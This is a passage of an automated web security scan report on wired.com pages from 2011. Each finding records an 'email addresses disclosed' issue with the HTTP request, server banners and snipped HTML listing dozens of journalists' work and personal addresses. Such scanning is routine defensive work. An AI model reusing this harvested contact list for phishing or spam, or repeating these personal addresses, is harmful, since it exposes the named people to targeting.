<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="mailto:subscriptions@wiredmag.com">subscriptions@wiredmag.com</a>
...[SNIP]...
<a href="mailto:subscriptions@wiredmag.com">subscriptions@wiredmag.com</a>
...[SNIP]...
<a href="mailto:louise_knapp@condenast.com">
...[SNIP]...
<a href="mailto:reprints@wiredmag.com">reprints@wiredmag.com</a>
...[SNIP]...
<a href="mailto:kathrina_manalac@wired.com">
...[SNIP]...

7.2. http://www.wired.com/about/press/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /about/press/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about/press/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:08:49 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=446
Expires: Wed, 12 Jan 2011 15:48:03 GMT
Date: Wed, 12 Jan 2011 15:40:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="mailto:samantha_rosenthal@condenast.com">samantha_rosenthal@condenast.com</a>
...[SNIP]...
<a href="mailto:Rachel_millner@condenast.com">Rachel_millner@condenast.com</a>
...[SNIP]...

7.3. http://www.wired.com/about/privacy-policy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /about/privacy-policy/

Issue detail

The following email address was disclosed in the response:

Request

GET /about/privacy-policy/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:45:55 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=438
Expires: Wed, 12 Jan 2011 15:48:09 GMT
Date: Wed, 12 Jan 2011 15:40:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="mailto:Privacy_administration@condenast.com">Privacy_administration@condenast.com</a>
...[SNIP]...

7.4. http://www.wired.com/about/user-agreement/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /about/user-agreement/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about/user-agreement/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:09:15 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=462
Expires: Wed, 12 Jan 2011 15:48:30 GMT
Date: Wed, 12 Jan 2011 15:40:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<br/>E-mail: copyright@sbandg.com</td>
...[SNIP]...
<a href="mailto:privacy@condenast.com">privacy@condenast.com</a>
...[SNIP]...

7.5. http://www.wired.com/autopia/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /autopia/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /autopia/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:33:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=383
Expires: Wed, 12 Jan 2011 15:44:57 GMT
Date: Wed, 12 Jan 2011 15:38:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:michael_calore@wired.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...
<a href="mailto:paurjason@gmail.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...
<a href="mailto:tips@jalopnik.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...
<a href="mailto:keith.barry@gmail.com">
...[SNIP]...
<a href="mailto:tips@jalopnik.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...
<a href="mailto:keith.barry@gmail.com">
...[SNIP]...
<a href="mailto:paurjason@gmail.com">
...[SNIP]...
<a href="mailto: Jkambitsis.wired@gmail.com">
...[SNIP]...
<a href="mailto: davedemerjian@gmail.com">
...[SNIP]...
<a href="mailto: darryl_siry@wired.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...

7.6. http://www.wired.com/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/autopia/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 13:16:06 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=474
Expires: Wed, 12 Jan 2011 15:46:36 GMT
Date: Wed, 12 Jan 2011 15:38:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 87749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:jtimmer@arstechnica.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...
<a href="mailto:keith.barry@gmail.com">
...[SNIP]...
<a href="mailto:paurjason@gmail.com">
...[SNIP]...
<a href="mailto: Jkambitsis.wired@gmail.com">
...[SNIP]...
<a href="mailto: davedemerjian@gmail.com">
...[SNIP]...
<a href="mailto: darryl_siry@wired.com">
...[SNIP]...
<a href="mailto:chuck_squatriglia@wired.com">
...[SNIP]...

7.7. http://www.wired.com/dangerroom/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /dangerroom/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /dangerroom/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/dangerroom/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:38:00 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=420
Expires: Wed, 12 Jan 2011 15:45:49 GMT
Date: Wed, 12 Jan 2011 15:38:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:david_axe@hotmail.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:david_axe@hotmail.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:danger_room@wired.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:katiedrumm@gmail.com">
...[SNIP]...
<a href="mailto:nohodge@gmail.com">
...[SNIP]...
<a href="mailto:sharonweinberger@gmail.com">
...[SNIP]...
<a href="mailto:david_axe@hotmail.com">
...[SNIP]...
<a href="mailto:d_hambling@hotmail.com">
...[SNIP]...
<a href="mailto:nick@nickthompson.com">
...[SNIP]...
<a href="mailto:ArmsControlWonk@gmail.com">
...[SNIP]...
<a href="mailto:armchairgeneralist@yahoo.com">
...[SNIP]...
<a href="mailto:kris.alexander@gmail.com">
...[SNIP]...
<a href="mailto:michael.tanji@threatswatch.org">
...[SNIP]...
<a href="mailto:michael.peck1@gmail.com">
...[SNIP]...

7.8. http://www.wired.com/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 09:44:19 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=427
Expires: Wed, 12 Jan 2011 15:46:00 GMT
Date: Wed, 12 Jan 2011 15:38:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:danger_room@wired.com">
...[SNIP]...
<a href="mailto:spencerackerman@gmail.com">
...[SNIP]...
<a href="mailto:katiedrumm@gmail.com">
...[SNIP]...
<a href="mailto:nohodge@gmail.com">
...[SNIP]...
<a href="mailto:sharonweinberger@gmail.com">
...[SNIP]...
<a href="mailto:david_axe@hotmail.com">
...[SNIP]...
<a href="mailto:d_hambling@hotmail.com">
...[SNIP]...
<a href="mailto:nick@nickthompson.com">
...[SNIP]...
<a href="mailto:ArmsControlWonk@gmail.com">
...[SNIP]...
<a href="mailto:armchairgeneralist@yahoo.com">
...[SNIP]...
<a href="mailto:kris.alexander@gmail.com">
...[SNIP]...
<a href="mailto:michael.tanji@threatswatch.org">
...[SNIP]...
<a href="mailto:michael.peck1@gmail.com">
...[SNIP]...

7.9. http://www.wired.com/epicenter/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /epicenter/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /epicenter/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:48:52 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=469
Expires: Wed, 12 Jan 2011 15:46:57 GMT
Date: Wed, 12 Jan 2011 15:39:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:OliviaSolon@johnabell.com">
...[SNIP]...
<a href="mailto:ryanpaul@johnabell.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:OliviaSolon@johnabell.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:jabell@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:jabell@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:Fred_Vogelstein@wired.com">
...[SNIP]...
<a href="mailto:frank_rose@wired.com">
...[SNIP]...
<a href="mailto:jeff_howe@wired.com">
...[SNIP]...
<a href="mailto:nynews@wired.com?subject=Comment from Epicenter Page:">
...[SNIP]...

7.10. http://www.wired.com/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:02:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:15 GMT
Date: Wed, 12 Jan 2011 15:39:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 85068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:jabell@wired.com">
...[SNIP]...
<a href="mailto:jabell@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:Fred_Vogelstein@wired.com">
...[SNIP]...
<a href="mailto:frank_rose@wired.com">
...[SNIP]...
<a href="mailto:jeff_howe@wired.com">
...[SNIP]...
<a href="mailto:nynews@wired.com?subject=Comment from Epicenter Page:">
...[SNIP]...

7.11. http://www.wired.com/epicenter/2011/01/metropcs-net-neutrality/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /epicenter/2011/01/metropcs-net-neutrality/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /epicenter/2011/01/metropcs-net-neutrality/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:04:29 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=462
Expires: Wed, 12 Jan 2011 15:47:01 GMT
Date: Wed, 12 Jan 2011 15:39:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:jabell@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:Fred_Vogelstein@wired.com">
...[SNIP]...
<a href="mailto:frank_rose@wired.com">
...[SNIP]...
<a href="mailto:jeff_howe@wired.com">
...[SNIP]...
<a href="mailto:nynews@wired.com?subject=Comment from Epicenter Page:">
...[SNIP]...

7.12. http://www.wired.com/gadgetlab/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /gadgetlab/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /gadgetlab/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:39:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:23 GMT
Date: Wed, 12 Jan 2011 15:39:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:wired@mistercharlie.co.uk">
...[SNIP]...
<a href="mailto:wired@mistercharlie.co.uk">
...[SNIP]...
<a href="mailto:wired@mistercharlie.co.uk">
...[SNIP]...
<a href="mailto:wired@mistercharlie.co.uk">
...[SNIP]...
<a href="mailto:wired@mistercharlie.co.uk">
...[SNIP]...
<a href="mailto:wired@mistercharlie.co.uk">
...[SNIP]...
<a href="mailto:mjisaac@gmail.com">
...[SNIP]...
<a href="mailto:mjisaac@gmail.com">
...[SNIP]...
<a href="mailto:mjisaac@gmail.com">
...[SNIP]...
<a href="mailto:wired@tweney.com">
...[SNIP]...
<a href="mailto:wired@tweney.com">
...[SNIP]...
<a href="mailto:wired@mistercharlie.co.uk">
...[SNIP]...
<a href="mailto:brian_chen@wired.com">
...[SNIP]...
<a href="mailto:mike_isaac@wired.com">
...[SNIP]...
<a href="mailto:mike@wired.com">
...[SNIP]...
<a href="mailto:gadgetnews@wired.com">
...[SNIP]...

7.13. http://www.wired.com/gamelife/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /gamelife/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /gamelife/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:43:51 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:42 GMT
Date: Wed, 12 Jan 2011 15:39:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:jschreier@gmail.com">
...[SNIP]...
<a href="mailto:wiredkohler@gmail.com">
...[SNIP]...
<a href="mailto:jschreier@gmail.com">
...[SNIP]...
<a href="mailto:jschreier@gmail.com">
...[SNIP]...
<a href="mailto:wiredkohler@gmail.com">
...[SNIP]...
<a href="mailto:wiredkohler@gmail.com">
...[SNIP]...
<a href="mailto:wiredkohler@gmail.com">
...[SNIP]...
<a href="mailto:wiredkohler@gmail.com">
...[SNIP]...
<a href="mailto:jschreier@gmail.com">
...[SNIP]...
<a href="mailto:Lewis_Wallace@wired.com">
...[SNIP]...
<a href="mailto:wiredkohler@gmail.com">
...[SNIP]...
<a href="mailto:plinky92092@gmail.com">
...[SNIP]...
<a href="mailto:jschreier@gmail.com">
...[SNIP]...
<a href="mailto:feitclub@gmail.com">
...[SNIP]...

7.14. http://www.wired.com/geekdad/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /geekdad/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /geekdad/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:32:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=66
Expires: Wed, 12 Jan 2011 15:40:53 GMT
Date: Wed, 12 Jan 2011 15:39:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 158179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:jenny@geekdad.com">
...[SNIP]...
<a href="mailto:editor@gamepeople.co.uk">
...[SNIP]...
<a href="mailto:fitzwillie@me.com">
...[SNIP]...
<a href="mailto:anton@geekdad.com">
...[SNIP]...
<a href="mailto:corrinal@cox.net">
...[SNIP]...
<a href="mailto:z@geekdad.com">
...[SNIP]...
<a href="mailto:matt@geekdad.com">
...[SNIP]...
<a href="mailto:michael@geekdad.com">
...[SNIP]...
<a href="mailto:ken@geekdad.com">
...[SNIP]...
<a href="mailto:anton@geekdad.com">
...[SNIP]...
<a href="mailto:matthew.d.morgan@gmail.com">
...[SNIP]...
<a href="mailto:jonathan@geekdad.com">
...[SNIP]...
<a href="mailto:ken@geekdad.com">
...[SNIP]...
<a href="mailto:nathan@geekdad.com">
...[SNIP]...
<a href="mailto:fitzwillie@me.com">
...[SNIP]...
<a href="mailto:ken@geekdad.com">
...[SNIP]...
<a href="mailto:matt@geekdad.com">
...[SNIP]...
<a href="mailto:canderson@wiredmag.com">
...[SNIP]...
<a href="mailto:john@geekdad.com">
...[SNIP]...
<a href="mailto:dave@geekdad.com">
...[SNIP]...
<a href="mailto:natania@geekdad.com">
...[SNIP]...
<a href="mailto:nathan@geekdad.com">
...[SNIP]...
